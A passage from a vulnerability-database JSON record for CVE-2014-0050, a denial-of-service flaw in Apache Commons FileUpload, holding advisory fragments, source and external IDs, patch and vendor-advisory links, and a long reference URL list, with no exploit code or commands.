References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2013-2035.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2172.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-2192.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4152.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-4517.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-6429.html\nhttps://www.redhat.com/security/data/cve/CVE-2013-6430.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0050.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0054.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-0085.html\nhttps://www.redhat.com/security/data/cve/CVE-2014-1904.html\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/jbossnetwork/restricted/listSoftware.html?product=jboss.fuse\u0026downloadType=distributions\u0026version=6.1.0\nhttps://access.redhat.com/site/documentation/en-US/Red_Hat_JBoss_Fuse/\n\n6. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTS/JWXlSAg2UNWIIRAh+fAJ9677T5eyaDWJuYLiFlhdkjOhZncgCgwPG0\n4iA38miFgmWgRtUp0Xztb6E=\n=/1+z\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n \n Apache Tomcat 7.x before 7.0.50 allows attackers to obtain Tomcat\n internals information by leveraging the presence of an untrusted web\n application with a context.xml, web.xml, *.jspx, *.tagx, or *.tld XML\n document containing an external entity declaration in conjunction\n with an entity reference, related to an XML External Entity (XXE)\n issue (CVE-2013-4590).  The verification\n of md5 checksums and GPG signatures is performed automatically for you. JBoss Web Server provides\norganizations with a single deployment platform for Java Server Pages (JSP)\nand Java Servlet technologies, PHP, and CGI. It uses a genuine high\nperformance hybrid technology that incorporates the best of the most recent\nOS technologies for processing high volume data, while keeping all the\nreference Java specifications. \n\nApache Commons FileUpload package makes it easy to add robust,\nhigh-performance, file upload capability to servlets and web applications",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          },
          {
            "db": "BID",
            "id": "65400"
          },
          {
            "db": "PACKETSTORM",
            "id": "125119"
          },
          {
            "db": "PACKETSTORM",
            "id": "129553"
          },
          {
            "db": "PACKETSTORM",
            "id": "128211"
          },
          {
            "db": "PACKETSTORM",
            "id": "139721"
          },
          {
            "db": "PACKETSTORM",
            "id": "126404"
          },
          {
            "db": "PACKETSTORM",
            "id": "126052"
          },
          {
            "db": "PACKETSTORM",
            "id": "140605"
          },
          {
            "db": "PACKETSTORM",
            "id": "127215"
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          },
          {
            "db": "PACKETSTORM",
            "id": "125109"
          },
          {
            "db": "PACKETSTORM",
            "id": "125687"
          },
          {
            "db": "PACKETSTORM",
            "id": "141092"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "131089"
          },
          {
            "db": "PACKETSTORM",
            "id": "126007"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          }
        ],
        "trust": 2.7
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=31615",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2014-0050",
            "trust": 3.0
          },
          {
            "db": "JVN",
            "id": "JVN14876762",
            "trust": 1.4
          },
          {
            "db": "HITACHI",
            "id": "HS14-015",
            "trust": 1.4
          },
          {
            "db": "HITACHI",
            "id": "HS14-017",
            "trust": 1.4
          },
          {
            "db": "HITACHI",
            "id": "HS14-016",
            "trust": 1.4
          },
          {
            "db": "BID",
            "id": "65400",
            "trust": 1.4
          },
          {
            "db": "PACKETSTORM",
            "id": "127215",
            "trust": 1.2
          },
          {
            "db": "SECUNIA",
            "id": "59232",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59399",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59185",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59187",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59039",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59500",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59184",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "60475",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59041",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59183",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "58075",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "58976",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59492",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "59725",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "60753",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "57915",
            "trust": 1.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2014-000017",
            "trust": 1.1
          },
          {
            "db": "HITACHI",
            "id": "HS14-008",
            "trust": 0.3
          },
          {
            "db": "EXPLOIT-DB",
            "id": "31615",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2014-0050",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126007",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "131089",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126144",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126746",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "141092",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "125687",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "125109",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126754",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "125119",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "140605",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126052",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "126404",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "139721",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "128211",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "129553",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          },
          {
            "db": "BID",
            "id": "65400"
          },
          {
            "db": "PACKETSTORM",
            "id": "126007"
          },
          {
            "db": "PACKETSTORM",
            "id": "131089"
          },
          {
            "db": "PACKETSTORM",
            "id": "126144"
          },
          {
            "db": "PACKETSTORM",
            "id": "126746"
          },
          {
            "db": "PACKETSTORM",
            "id": "141092"
          },
          {
            "db": "PACKETSTORM",
            "id": "125687"
          },
          {
            "db": "PACKETSTORM",
            "id": "125109"
          },
          {
            "db": "PACKETSTORM",
            "id": "126754"
          },
          {
            "db": "PACKETSTORM",
            "id": "125119"
          },
          {
            "db": "PACKETSTORM",
            "id": "127215"
          },
          {
            "db": "PACKETSTORM",
            "id": "140605"
          },
          {
            "db": "PACKETSTORM",
            "id": "126052"
          },
          {
            "db": "PACKETSTORM",
            "id": "126404"
          },
          {
            "db": "PACKETSTORM",
            "id": "139721"
          },
          {
            "db": "PACKETSTORM",
            "id": "128211"
          },
          {
            "db": "PACKETSTORM",
            "id": "129553"
          },
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "id": "VAR-201404-0585",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.41471650857142855
      },
      "last_update_date": "2026-03-09T21:05:21.141000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Debian Security Advisories: DSA-2856-1 libcommons-fileupload-java -- denial of service",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=642945afda91c20bf7efbc771575262b"
          },
          {
            "title": "Amazon Linux AMI: ALAS-2014-312",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2014-312"
          },
          {
            "title": "Ubuntu Security Notice: tomcat6, tomcat7 vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-2130-1"
          },
          {
            "title": "IBM: Security Bulletin: A vulnerability in Apache Commons Fileupload affects IBM Tivoli Business Service Manager (CVE-2013-2186,  CVE-2013-0248, CVE-2016-3092, CVE-2014-0050, 220723)",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8bc75a85691b82e540dfdc9fe13fab57"
          },
          {
            "title": "Debian Security Advisories: DSA-2897-1 tomcat7 -- security update",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2d279d06ad61c5b596d45790e28df427"
          },
          {
            "title": "Debian CVElist Bug Report Logs: tomcat7: CVE-2013-2071",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=94f2b1959436d579ea8b492b708008b8"
          },
          {
            "title": "Amazon Linux AMI: ALAS-2014-344",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2014-344"
          },
          {
            "title": "Symantec Security Advisories: SA100 : Apache Tomcat Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories\u0026qid=94a4a81a426ea8a524a402abe366c375"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - April 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4b527561ba1a5de7a529c8a93679f585"
          },
          {
            "title": "IBM: IBM Security Bulletin: IBM Security Privileged Identity Manager is affected by multiple security vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8580d3cd770371e2ef0f68ca624b80b0"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=744c19dc9f4f70ad58059bf8733ec9c1"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2017",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=523d3f220a64ff01dd95e064bd37566a"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - January 2015",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4a692d6d60aa31507cb101702b494c51"
          },
          {
            "title": "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=55ea315dfb69fce8383762ac64250315"
          },
          {
            "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c"
          },
          {
            "title": "",
            "trust": 0.1,
            "url": "https://github.com/Shiverino/NPE2223 "
          },
          {
            "title": "cve-2014-0050",
            "trust": 0.1,
            "url": "https://github.com/jrrdev/cve-2014-0050 "
          },
          {
            "title": "victims-version-search",
            "trust": 0.1,
            "url": "https://github.com/adedov/victims-version-search "
          },
          {
            "title": "-maven-security-versions",
            "trust": 0.1,
            "url": "https://github.com/nagauker/-maven-security-versions "
          },
          {
            "title": "maven-security-versions-Travis",
            "trust": 0.1,
            "url": "https://github.com/klee94/maven-security-versions-Travis "
          },
          {
            "title": "victims",
            "trust": 0.1,
            "url": "https://github.com/alexsh88/victims "
          },
          {
            "title": "victims",
            "trust": 0.1,
            "url": "https://github.com/tmpgit3000/victims "
          },
          {
            "title": "maven-security-versions",
            "trust": 0.1,
            "url": "https://github.com/victims/maven-security-versions "
          },
          {
            "title": "CDL",
            "trust": 0.1,
            "url": "https://github.com/NCSU-DANCE-Research-Group/CDL "
          },
          {
            "title": "Classified-Distributed-Learning-for-Detecting-Security-Attacks-in-Containerized-Applications",
            "trust": 0.1,
            "url": "https://github.com/yuhang-lin/Classified-Distributed-Learning-for-Detecting-Security-Attacks-in-Containerized-Applications "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-264",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2014-0050"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 1.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0050"
          },
          {
            "trust": 1.5,
            "url": "http://rhn.redhat.com/errata/rhsa-2014-0400.html"
          },
          {
            "trust": 1.4,
            "url": "http://jvn.jp/en/jp/jvn14876762/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676410"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676401"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677724"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675432"
          },
          {
            "trust": 1.4,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-016/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-017/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676403"
          },
          {
            "trust": 1.4,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-015/index.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.vmware.com/security/advisories/vmsa-2014-0007.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
          },
          {
            "trust": 1.4,
            "url": "http://www.vmware.com/security/advisories/vmsa-2014-0008.html"
          },
          {
            "trust": 1.4,
            "url": "http://rhn.redhat.com/errata/rhsa-2014-0253.html"
          },
          {
            "trust": 1.4,
            "url": "http://rhn.redhat.com/errata/rhsa-2014-0252.html"
          },
          {
            "trust": 1.3,
            "url": "http://advisories.mageia.org/mgasa-2014-0110.html"
          },
          {
            "trust": 1.2,
            "url": "http://tomcat.apache.org/security-8.html"
          },
          {
            "trust": 1.2,
            "url": "http://svn.apache.org/r1565143"
          },
          {
            "trust": 1.2,
            "url": "http://tomcat.apache.org/security-7.html"
          },
          {
            "trust": 1.1,
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1062337"
          },
          {
            "trust": 1.1,
            "url": "http://jvndb.jvn.jp/jvndb/jvndb-2014-000017"
          },
          {
            "trust": 1.1,
            "url": "http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/57915"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/58976"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59232"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59183"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59500"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/58075"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676853"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59187"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59041"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59185"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59492"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/bid/65400"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59039"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59725"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59399"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676656"
          },
          {
            "trust": 1.1,
            "url": "http://packetstormsecurity.com/files/127215/vmware-security-advisory-2014-0007.html"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/59184"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676405"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-350733.htm"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/60475"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/60753"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21677691"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21681214"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/security/advisories/vmsa-2014-0012.html"
          },
          {
            "trust": 1.1,
            "url": "http://seclists.org/fulldisclosure/2014/dec/23"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2015:084"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676091"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21676092"
          },
          {
            "trust": 1.1,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21669554"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html"
          },
          {
            "trust": 1.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=143136844732487\u0026w=2"
          },
          {
            "trust": 1.1,
            "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755"
          },
          {
            "trust": 1.1,
            "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05376917"
          },
          {
            "trust": 1.1,
            "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
          },
          {
            "trust": 1.1,
            "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.ubuntu.com/usn/usn-2130-1"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2014/dsa-2856"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/534161/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/532549/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "https://security.gentoo.org/glsa/202107-39"
          },
          {
            "trust": 1.1,
            "url": "http://mail-archives.apache.org/mod_mbox/commons-dev/201402.mbox/%3c52f373fc.9030907%40apache.org%3e"
          },
          {
            "trust": 0.6,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4322"
          },
          {
            "trust": 0.5,
            "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
          },
          {
            "trust": 0.5,
            "url": "https://bugzilla.redhat.com/):"
          },
          {
            "trust": 0.5,
            "url": "https://www.redhat.com/security/data/cve/cve-2014-0050.html"
          },
          {
            "trust": 0.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4286"
          },
          {
            "trust": 0.5,
            "url": "https://access.redhat.com/security/team/contact/"
          },
          {
            "trust": 0.4,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0373.html"
          },
          {
            "trust": 0.4,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755"
          },
          {
            "trust": 0.4,
            "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05376917"
          },
          {
            "trust": 0.4,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0525.html"
          },
          {
            "trust": 0.4,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0527.html"
          },
          {
            "trust": 0.4,
            "url": "https://access.redhat.com/security/updates/classification/#moderate"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0050"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/100179973"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/fulldisclosure/2014/feb/41"
          },
          {
            "trust": 0.3,
            "url": "http://www.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "http://struts.apache.org/release/2.3.x/docs/s2-020.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.arubanetworks.com/support/alerts/aid-051414.asc"
          },
          {
            "trust": 0.3,
            "url": "http://tomcat.apache.org/"
          },
          {
            "trust": 0.3,
            "url": "http://commons.apache.org/proper/commons-fileupload//"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21668731"
          },
          {
            "trust": 0.3,
            "url": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15189.html"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004740"
          },
          {
            "trust": 0.3,
            "url": "http://seclists.org/bugtraq/2014/jun/151"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0401.html"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680564"
          },
          {
            "trust": 0.3,
            "url": "https://downloads.avaya.com/css/p8/documents/100178813"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21682645"
          },
          {
            "trust": 0.3,
            "url": "http://www.ibm.com/support/docview.wss?uid=swg21669383"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21675470"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21671261"
          },
          {
            "trust": 0.3,
            "url": "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-008/index.html"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04657823"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21680714"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21669021"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24037189"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671330"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673004"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678830"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0459.html"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0526.html"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0528.html"
          },
          {
            "trust": 0.3,
            "url": "https://launchpad.support.sap.com/#/notes/2629535"
          },
          {
            "trust": 0.3,
            "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=497256000"
          },
          {
            "trust": 0.3,
            "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=495289255"
          },
          {
            "trust": 0.3,
            "url": "https://rhn.redhat.com/errata/rhsa-2014-0429.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-350733.htm"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676853"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678364"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21678373"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684861"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21684286"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21672321"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21678359"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21681214,swg21680564"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670373"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670400"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21682055"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004813"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21688411"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21670769"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21680366"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671527"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21666799"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21674439"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673701"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672717"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21667254"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676092"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21676091"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21673260"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673682"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21673581"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004858"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004859"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21672032"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21669020"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21671201"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671653"
          },
          {
            "trust": 0.3,
            "url": "https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004819"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21668978"
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21671684"
          },
          {
            "trust": 0.3,
            "url": "https://www.redhat.com/security/data/cve/cve-2013-4286.html"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4590"
          },
